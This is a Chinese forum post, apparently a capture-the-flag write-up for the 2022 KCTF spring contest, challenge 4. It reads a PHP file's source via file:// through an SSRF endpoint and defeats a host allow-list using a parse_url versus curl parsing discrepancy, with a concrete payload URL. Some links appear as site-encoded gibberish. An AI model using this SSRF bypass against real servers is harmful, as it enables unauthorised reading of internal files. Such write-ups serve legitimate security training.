首页
社区
课程
招聘
[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP
发表于: 2022-5-16 21:14 5090

[原创]2022KCTF 春季赛 第四题 飞蛾扑火 WP

2022-5-16 21:14
5090

图片描述
发现存在一个phpinfo和一个ssrf的地址
图片描述
尝试file://去读ssrf文件源代码-url.php读到了源码
e93K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3g2)9J5k6e0x3$3i4K6u0W2x3e0b7#2i4K6u0W2x3e0f1%4i4K6y4m8z5o6l9@1y4q4)9J5c8Y4g2J5L8q4)9J5k6i4m8Z5M7q4)9K6c8Y4g2J5L8q4)9K6c8r3k6A6L8r3g2Q4x3@1q4Q4x3V1k6Q4x3V1j5I4x3U0N6Q4x3X3f1H3i4K6u0W2x3q4)9J5k6e0q4Q4x3V1k6$3j5i4u0Q4x3V1k6%4N6%4N6Q4x3V1k6Z5N6r3#2D9i4K6u0r3N6i4u0D9i4K6u0W2M7r3S2H3
图片描述
看到了php_curl以及

1
2
3
4
5
6
7
if($host=="ctf.pediy.com"||$host=="127.0.0.1"||$host=="localhost"){
//echo curl_request("9daK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8U0p5J5x3#2)9J5k6e0f1%4i4K6u0W2x3U0f1@1i4K6u0W2y4o6u0Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3","get",[],true,5);//get flag
  echo curl_request($url,'',"get",[],true,5);
 
}else{
die("host not allow");
}

这里需要绕过让host满足条件
因为存在curl一个特性:
a://b/../flag.php,parse_url会认为host是b,但是用phpcurl访问时相当于db1K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3q4Q4x3V1k6X3L8r3q4Y4i4K6u0W2M7r3S2H3
构建

1
http://121.36.145.157:8044/url.php?url=123.57.254.42://127.0.0.1/../flag.php

读取flag

 

图片描述


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2022-5-17 12:34 被柘狐编辑 ,原因:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回